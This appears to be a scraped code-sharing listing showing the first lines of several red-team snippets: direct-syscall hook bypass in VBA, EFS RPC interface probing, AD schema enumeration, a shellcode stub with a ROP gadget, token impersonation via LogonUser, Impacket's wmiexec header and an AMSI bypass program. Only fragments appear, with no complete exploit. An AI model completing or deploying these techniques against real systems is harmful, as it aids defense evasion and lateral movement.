This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
' Proof of Concept: retrieving SSN for syscalling in VBA | |
' Author: Juan Manuel Fernandez (@TheXC3LL) | |
'Based on: | |
'https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/ | |
'https://www.crummie5.club/freshycalls/ | |
Private Type LARGE_INTEGER |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Install-Module NtObjectManager | |
Import-Module NtObjectManager | |
$Servers = Get-RpcServer -Path C:\Windows\system32\efssvc.dll ` | |
-DbgHelpPath 'C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\dbghelp.dll' | |
$EfsInterace = $Servers | Where-Object { $_.InterfaceId -eq 'df1941c5-fe89-4e79-bf10-463657acf44d' } | |
$client = Get-RpcClient -Server $EfsInterace | |
$client.Connect() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Dictionary to hold superclass names | |
$superClass = @{} | |
# List to hold class names that inherit from container and are allowed to live under computer object | |
$vulnerableSchemas = [System.Collections.Generic.List[string]]::new() | |
# Resolve schema naming context | |
$schemaNC = (Get-ADRootDSE).schemaNamingContext | |
# Enumerate all class schemas |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* | |
* List process information on windows without opening any handles, including process architecture and username | |
* | |
*/ | |
#include <Windows.h> | |
#include <stdio.h> | |
#include <math.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <Windows.h> | |
#include <ImageHlp.h> | |
#include <strsafe.h> | |
#include "loaded_psp_drivers.h" | |
#include <set> | |
#include <string> | |
#include <algorithm> | |
#pragma comment(lib, "crypt32.lib") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <Windows.h> | |
// example shellcode | |
// make sure to have 8 reserved bytes for 64-bit ret | |
// gadget to rop into the actual shellcode | |
CHAR shellcode[] = { | |
// 8 bytes here for jmp loop gadget | |
0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, | |
// actual shellcode starts here | |
0xEB, 0xFE, 0x01, 0x23, 0x45, 0x67, 0x89, 0xAA, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Add-Type -TypeDefinition @" | |
using System; | |
using System.Runtime.InteropServices; | |
using System.Security.Principal; | |
public static class Advapi32 | |
{ | |
[DllImport("advapi32.dll", SetLastError = true)] | |
public static extern bool LogonUser(string pszUsername, string pszDomain, string pszPassword, int dwLogonType, int dwLogonProvider, ref IntPtr phToken); | |
[DllImport("advapi32.dll", SetLastError=true)] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. | |
# | |
# This software is provided under under a slightly modified version | |
# of the Apache Software License. See the accompanying LICENSE file | |
# for more information. | |
# | |
# A similar approach to smbexec but executing commands through WMI. | |
# Main advantage here is it runs under the user (has to be Admin) | |
# account, not SYSTEM, plus, it doesn't generate noisy messages |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include "stdafx.h" | |
#include <iostream> | |
LPVOID lpJmpRealloc = nullptr; | |
DWORD Backup_Eax, Handle, Address_1, New, Old, *DwSizee; | |
const DWORD_PTR __declspec(naked) GetGateAddress() | |
{ | |
__asm | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Runtime.InteropServices; | |
namespace AMSIBypass2 | |
{ | |
class Program | |
{ | |
[DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)] | |
static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName); |
NewerOlder